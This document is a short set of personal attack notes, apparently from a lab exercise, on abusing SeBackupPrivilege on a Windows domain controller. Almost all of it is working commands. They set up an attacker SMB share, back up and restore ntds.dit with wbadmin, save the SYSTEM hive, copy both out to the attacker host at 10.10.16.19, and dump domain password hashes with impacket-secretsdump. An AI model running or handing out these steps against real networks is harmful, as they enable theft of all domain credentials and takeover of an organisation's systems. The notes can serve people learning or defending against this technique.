Abusing SeBackupPrivilege

Want to natively abuse SeBackupPrivilege to a domain controller and backup ntds.dit and extract hashes offline? (using kali)

Here are my notes:

Modify the contents of /etc/samba/smb.conf to the following:

[Global]
interfaces = tun0 (modify to vpn adapter only if needed)

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser

Create a new user that matches the user in the force user parameter:

sudo adduser smbuser

Will be prompted to create a new password:
Hacktheplanet!

Next, create a password for our newly created user:

sudo smbpasswd -a smbuser

Then start the SMB demon with service smbd restart

on compromised server map network drive from share setup in previous step:

net use k: \\10.10.16.19\smb /user:smbuser ‘Hacktheplanet!’

On the Win-Rm shell, we can backup the NTDS folder with wbadmin:

echo “Y” | wbadmin start backup -backuptarget:\\10.10.16.19\smb -include:c:\windows\ntds

Now check versions of backups:

wbadmin get versions

Figure 1 — Listing Backup Versions

Now restore the files to c:\ (This will allow us to copy ntds.dit to our attacker sysem):

echo “Y” | wbadmin start recovery -version:01/01/2023–22:55 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

Confirm restore to c:\ :

Figure 2 — Confirming restored backup

Copy system hive to c:

reg save HKLM\SYSTEM C:\system.hive

Exfil to smb share:

cp ntds.dit \\10.10.16.19\smb\NTDS.dit
cp system.hive \\10.10.16.19\smb\system.hive

Extract hashes with impacket secrets dump:

impacket-secretsdump -ntds NTDS.dit -system system.hive LOCAL